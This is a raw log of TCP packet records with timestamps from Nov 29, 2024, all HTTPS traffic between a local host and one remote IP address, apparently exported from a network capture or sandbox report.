                                                                                                                            Nov 29, 2024 08:32:01.074691057 CET4434991813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.075149059 CET49918443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.075176001 CET4434991813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.075579882 CET49918443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.075586081 CET4434991813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.519098043 CET4434991813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.522147894 CET4434991813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.522521973 CET49918443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.533420086 CET49918443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.533436060 CET4434991813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.533446074 CET49918443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.533451080 CET4434991813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.567451954 CET4434991913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.572427988 CET49919443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.572453022 CET4434991913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.604526043 CET49919443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.604537010 CET4434991913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.691045046 CET49923443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.691093922 CET4434992313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.691176891 CET49923443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.720206022 CET49923443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.720221043 CET4434992313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.728735924 CET4434992013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.735738993 CET49920443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.735761881 CET4434992013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.738907099 CET49920443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.738912106 CET4434992013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.802293062 CET4434992113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.828011990 CET49921443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.828036070 CET4434992113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:01.831131935 CET49921443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:01.831140995 CET4434992113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.021522045 CET4434991913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.024605036 CET4434991913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.024647951 CET4434991913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.024647951 CET49919443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.024734974 CET49919443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.043759108 CET49919443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.043781996 CET4434991913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.043792963 CET49919443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.043798923 CET4434991913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.047122955 CET49924443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.047158957 CET4434992413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.047327995 CET49924443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.055483103 CET49924443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.055493116 CET4434992413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.171087027 CET4434992013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.174710989 CET4434992013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.174766064 CET49920443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.184334993 CET49920443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.184350967 CET4434992013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.187753916 CET49925443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.187783957 CET4434992513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.187954903 CET49925443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.189928055 CET49925443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.189941883 CET4434992513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.225687027 CET4434992213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.226129055 CET49922443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.226139069 CET4434992213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.226596117 CET49922443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.226600885 CET4434992213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.245162964 CET4434992113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.245199919 CET4434992113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.245254040 CET4434992113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.245265007 CET49921443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.245301962 CET49921443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.245809078 CET49921443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.245826006 CET4434992113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.245887995 CET49921443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.245893002 CET4434992113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.253524065 CET49926443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.253546000 CET4434992613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.254062891 CET49926443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.254848957 CET49926443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.254858971 CET4434992613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.669399023 CET4434992213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.669473886 CET4434992213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.669595003 CET49922443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.673700094 CET49922443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.673708916 CET4434992213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.673717022 CET49922443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.673722029 CET4434992213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.679505110 CET49927443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.679522991 CET4434992713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:02.679585934 CET49927443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.680022001 CET49927443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:02.680033922 CET4434992713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.499722004 CET4434992313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.506660938 CET49923443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.506695032 CET4434992313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.507441044 CET49923443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.507446051 CET4434992313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.835413933 CET4434992413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.851012945 CET49924443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.851028919 CET4434992413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.851520061 CET49924443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.851525068 CET4434992413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.943686008 CET4434992313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.947066069 CET4434992313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.947115898 CET49923443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.947124004 CET4434992313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.947185993 CET49923443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.948313951 CET49923443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.948332071 CET4434992313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.948374033 CET49923443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.948381901 CET4434992313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.955362082 CET49928443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.955394030 CET4434992813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.955693960 CET49928443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.955916882 CET49928443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.955929041 CET4434992813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.984767914 CET4434992513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.986732006 CET49925443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.986763954 CET4434992513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:03.987411976 CET49925443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:03.987417936 CET4434992513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.104402065 CET4434992613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.104795933 CET49926443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.104820967 CET4434992613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.105300903 CET49926443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.105307102 CET4434992613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.280958891 CET4434992413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.284076929 CET4434992413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.284212112 CET49924443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.284382105 CET49924443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.284394979 CET4434992413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.284405947 CET49924443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.284411907 CET4434992413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.289732933 CET49929443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.289778948 CET4434992913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.290105104 CET49929443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.290411949 CET49929443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.290422916 CET4434992913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.431484938 CET4434992513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.431565046 CET4434992513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.432651043 CET49925443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.432672977 CET4434992513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.435034037 CET49925443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.435045958 CET4434992513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.435081959 CET49925443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.435462952 CET4434992513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.435551882 CET4434992513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.435621977 CET49925443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.438133001 CET49930443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.438167095 CET4434993013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.438402891 CET49930443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.438535929 CET49930443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.438543081 CET4434993013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.461446047 CET4434992713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.461815119 CET49927443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.461822033 CET4434992713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.462265015 CET49927443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.462269068 CET4434992713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.565794945 CET4434992613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.565846920 CET4434992613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.565901995 CET49926443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.565927029 CET4434992613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.569439888 CET4434992613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.569504976 CET49926443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.584620953 CET49926443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.584650993 CET4434992613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.584669113 CET49926443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.584675074 CET4434992613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.589272976 CET49931443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.589312077 CET4434993113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.589392900 CET49931443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.589579105 CET49931443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.589591980 CET4434993113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.905221939 CET4434992713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.908682108 CET4434992713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.908732891 CET4434992713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.909219980 CET49927443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.912317038 CET49927443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.912333012 CET4434992713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.915385962 CET49932443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.915422916 CET4434993213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:04.915488958 CET49932443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.915649891 CET49932443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:04.915664911 CET4434993213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:05.738214970 CET4434992813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:05.738663912 CET49928443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:05.738679886 CET4434992813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:05.739125013 CET49928443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:05.739130020 CET4434992813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.068780899 CET4434992913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.069294930 CET49929443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.069329977 CET4434992913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.069780111 CET49929443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.069785118 CET4434992913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.184495926 CET4434992813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.187535048 CET4434992813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.187649012 CET49928443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.187949896 CET49928443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.187964916 CET4434992813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.188030005 CET49928443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.188034058 CET4434992813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.190798044 CET49933443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.190836906 CET4434993313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.191106081 CET49933443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.191154957 CET49933443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.191160917 CET4434993313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.283437014 CET4434993013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.284071922 CET49930443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.284095049 CET4434993013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.284603119 CET49930443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.284607887 CET4434993013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.306329012 CET4434993113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.306839943 CET49931443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.306864023 CET4434993113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.307261944 CET49931443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.307274103 CET4434993113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.511924982 CET4434992913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.516022921 CET4434992913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.516084909 CET4434992913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.516110897 CET49929443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.516146898 CET49929443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.516170979 CET49929443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.516194105 CET4434992913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.516204119 CET49929443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.516211033 CET4434992913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.518790960 CET49934443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.518831968 CET4434993413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.519119978 CET49934443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.519328117 CET49934443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.519339085 CET4434993413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.736402988 CET4434993013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.739500046 CET4434993013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.739558935 CET49930443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.741215944 CET49930443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.741233110 CET4434993013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.741241932 CET49930443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.741247892 CET4434993013.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.742034912 CET4434993113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.745636940 CET49935443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.745644093 CET4434993113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.745681047 CET4434993513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.745697021 CET4434993113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.745728016 CET49931443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.745743990 CET49935443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.745779037 CET49931443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.746362925 CET49935443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.746381998 CET4434993513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.746412039 CET49931443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.746412039 CET49931443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.746428967 CET4434993113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.746440887 CET4434993113.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.748346090 CET49936443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.748367071 CET4434993613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.748620987 CET49936443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.748754978 CET49936443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.748764992 CET4434993613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.762238026 CET4434993213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.764190912 CET49932443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.764214039 CET4434993213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:06.764635086 CET49932443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:06.764640093 CET4434993213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:07.214926958 CET4434993213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:07.218713045 CET4434993213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:07.218775988 CET49932443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:07.218852043 CET49932443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:07.218869925 CET4434993213.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:07.221283913 CET49937443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:07.221321106 CET4434993713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:07.221383095 CET49937443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:07.221544027 CET49937443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:07.221559048 CET4434993713.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:07.972759962 CET4434993313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:07.974984884 CET49933443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:07.974998951 CET4434993313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:07.975441933 CET49933443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:07.975446939 CET4434993313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.236778021 CET4434993413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.237377882 CET49934443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.237404108 CET4434993413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.237864017 CET49934443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.237869024 CET4434993413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.416454077 CET4434993313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.420849085 CET4434993313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.420906067 CET4434993313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.420917988 CET49933443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.420969009 CET49933443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.421089888 CET49933443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.421089888 CET49933443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.421108961 CET4434993313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.421118975 CET4434993313.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.424034119 CET49938443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.424088955 CET4434993813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.424181938 CET49938443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.424412012 CET49938443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.424427986 CET4434993813.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.465279102 CET4434993613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.465751886 CET49936443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.465797901 CET4434993613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.466202974 CET49936443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.466212034 CET4434993613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.526854038 CET4434993513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.530297995 CET49935443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.530323029 CET4434993513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.531013012 CET49935443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.531019926 CET4434993513.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.671293020 CET4434993413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.674978971 CET4434993413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.675071955 CET49934443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.679651976 CET49934443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.679687977 CET4434993413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.679704905 CET49934443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.679712057 CET4434993413.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.682507038 CET49939443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.682554007 CET4434993913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.683259964 CET49939443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.683521986 CET49939443192.168.2.513.107.246.63
                                                                                                                            Nov 29, 2024 08:32:08.683537960 CET4434993913.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.900603056 CET4434993613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.903687954 CET4434993613.107.246.63192.168.2.5
                                                                                                                            Nov 29, 2024 08:32:08.904164076 CET49936443192.168.2.513.107.246.63
